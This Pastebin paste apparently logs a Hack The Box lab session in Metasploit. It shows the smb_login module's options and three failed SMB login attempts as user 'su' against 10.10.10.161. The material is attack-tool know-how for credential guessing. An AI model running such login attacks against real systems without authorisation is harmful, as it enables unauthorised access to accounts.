Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Module options (auxiliary/scanner/smb/smb_login):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
- BLANK_PASSWORDS false no Try blank passwords for all users
- BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
- DB_ALL_CREDS false no Try each user/password couple stored in the current database
- DB_ALL_PASS false no Add all passwords in the current database to the list
- DB_ALL_USERS false no Add all users in the current database to the list
- DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
- DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
- PASS_FILE no File containing passwords, one per line
- PRESERVE_DOMAINS true no Respect a username that contains a domain name.
- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
- RECORD_GUEST false no Record guest-privileged random logins to the database
- RHOSTS 10.10.10.161 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
- RPORT 445 yes The SMB service port (TCP)
- SMBDomain . no The Windows domain to use for authentication
- SMBPass no The password for the specified username
- SMBUser su no The username to authenticate as
- STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
- THREADS 1 yes The number of concurrent threads (max one per host)
- USERPASS_FILE no File containing users and passwords separated by space, one pair per line
- USER_AS_PASS false no Try the username as the password for all users
- USER_FILE no File containing usernames, one per line
- VERBOSE true yes Whether to print output for all attempts
- msf5 auxiliary(scanner/smb/smb_login) > set SMBPass password
- SMBPass => password
- msf5 auxiliary(scanner/smb/smb_login) > run
- [*] 10.10.10.161:445 - 10.10.10.161:445 - Starting SMB login bruteforce
- [-] 10.10.10.161:445 - 10.10.10.161:445 - Failed: '.\su:password',
- [*] 10.10.10.161:445 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain HTB
- SMBDomain => HTB
- msf5 auxiliary(scanner/smb/smb_login) > run
- [*] 10.10.10.161:445 - 10.10.10.161:445 - Starting SMB login bruteforce
- [-] 10.10.10.161:445 - 10.10.10.161:445 - Failed: 'HTB\su:password',
- [*] 10.10.10.161:445 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- msf5 auxiliary(scanner/smb/smb_login) > options
- Module options (auxiliary/scanner/smb/smb_login):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
- BLANK_PASSWORDS false no Try blank passwords for all users
- BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
- DB_ALL_CREDS false no Try each user/password couple stored in the current database
- DB_ALL_PASS false no Add all passwords in the current database to the list
- DB_ALL_USERS false no Add all users in the current database to the list
- DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
- DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
- PASS_FILE no File containing passwords, one per line
- PRESERVE_DOMAINS true no Respect a username that contains a domain name.
- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
- RECORD_GUEST false no Record guest-privileged random logins to the database
- RHOSTS 10.10.10.161 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
- RPORT 445 yes The SMB service port (TCP)
- SMBDomain HTB no The Windows domain to use for authentication
- SMBPass password no The password for the specified username
- SMBUser su no The username to authenticate as
- STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
- THREADS 1 yes The number of concurrent threads (max one per host)
- USERPASS_FILE no File containing users and passwords separated by space, one pair per line
- USER_AS_PASS false no Try the username as the password for all users
- USER_FILE no File containing usernames, one per line
- VERBOSE true yes Whether to print output for all attempts
- msf5 auxiliary(scanner/smb/smb_login) > run
- [*] 10.10.10.161:445 - 10.10.10.161:445 - Starting SMB login bruteforce
- [-] 10.10.10.161:445 - 10.10.10.161:445 - Failed: 'HTB\su:password',
- [*] 10.10.10.161:445 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- msf5 auxiliary(scanner/smb/smb_login) >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement